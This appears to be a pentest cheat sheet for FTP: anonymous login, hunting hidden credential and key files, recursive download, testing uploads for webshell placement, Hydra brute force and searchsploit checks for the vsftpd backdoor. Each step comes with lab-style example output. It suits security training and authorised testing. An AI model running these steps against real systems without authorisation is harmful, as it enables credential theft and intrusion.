FTP (21)
Anonymous login
Try blank password and email@email.com — Misconfigured FTP servers
ftp $IP
Username: anonymous
Password: (blank)
Example Output
230 Login successful.
ftp> ls
-rw-r--r-- 1 0 0 1024 Jan 01 config.txt
-rw-r--r-- 1 0 0 512 Jan 01 backup.zip
List all files including hidden
Check every directory — Hidden files with creds
ls -la
cd ..
ls -la
Example Output
drwxr-xr-x 2 0 0 4096 Jan 01 .
drwxr-xr-x 3 0 0 4096 Jan 01 ..
-rw-r--r-- 1 0 0 220 Jan 01 .bash_history
-rw-r--r-- 1 0 0 1679 Jan 01 .id_rsa
Download everything
Recursive download — Grab all files for offline review
wget -r ftp://anonymous@$IP/
Example Output
wget -r ftp://anonymous@10.10.10.5/
Downloaded: 12 files, 45K
./10.10.10.5/backup.zip
./10.10.10.5/.hidden/credentials.txt
(Check every file offline)
Check for write access
Can you upload? webshell potential — Upload to web root = RCE
put test.txt
Example Output
ftp> put test.txt
226 Transfer complete.
(SUCCESS = you can upload webshells)
Brute force creds
If anonymous fails — Default/weak creds
hydra -L users.txt -P passwords.txt ftp://$IP
Example Output
hydra -L users.txt -P passwords.txt ftp://10.10.10.5
[21][ftp] host: 10.10.10.5 login: admin password: admin123
(FOUND VALID CREDENTIALS)
Check FTP version for exploits
Version from nmap output — vsftpd 2.3.4 backdoor, ProFTPD exploits
searchsploit vsftpd
searchsploit proftpd
Example Output
searchsploit vsftpd
vsftpd 2.3.4 - Backdoor Command Execution
(If version matches = instant shell)